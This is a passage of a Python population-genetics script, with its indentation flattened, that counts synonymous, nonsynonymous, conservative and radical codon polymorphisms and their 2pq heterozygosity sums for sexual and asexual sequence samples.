sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
sex_synS += 2
sex_sum2PQ_S += (2*twoPQ)
i += 1
# Accumulators for the codon-by-codon scan of the asexual sample,
# mirroring the sex_* accumulators above: asex_sum2PQ_* hold summed
# expected heterozygosity (2pq) per mutation class; asex_*S hold
# segregating-change counts (S = synonymous, N = nonsynonymous,
# C/R 1-7 = conservative/radical per CRI partition, meanC/meanR = by
# mean CRI score).
asex_sum2PQ_S = 0
asex_sum2PQ_N = 0
asex_sum2PQ_C1 = 0
asex_sum2PQ_C2 = 0
asex_sum2PQ_C3 = 0
asex_sum2PQ_C4 = 0
asex_sum2PQ_C5 = 0
asex_sum2PQ_C6 = 0
asex_sum2PQ_C7 = 0
asex_sum2PQ_R1 = 0
asex_sum2PQ_R2 = 0
asex_sum2PQ_R3 = 0
asex_sum2PQ_R4 = 0
asex_sum2PQ_R5 = 0
asex_sum2PQ_R6 = 0
asex_sum2PQ_R7 = 0
asex_sum2PQ_meanC = 0
asex_sum2PQ_meanR = 0
asex_synS = 0
asex_nsynS = 0
asex_con1S = 0
asex_con2S = 0
asex_con3S = 0
asex_con4S = 0
asex_con5S = 0
asex_con6S = 0
asex_con7S = 0
asex_meanConS = 0
asex_rad1S = 0
asex_rad2S = 0
asex_rad3S = 0
asex_rad4S = 0
asex_rad5S = 0
asex_rad6S = 0
asex_rad7S = 0
asex_meanRadS = 0
# Reset the codon index for the asexual scan loop that follows.
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in asexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 1)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
asex_synS += 1
asex_sum2PQ_S += twoPQ
else:
asex_nsynS += 1
asex_sum2PQ_N += twoPQ
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
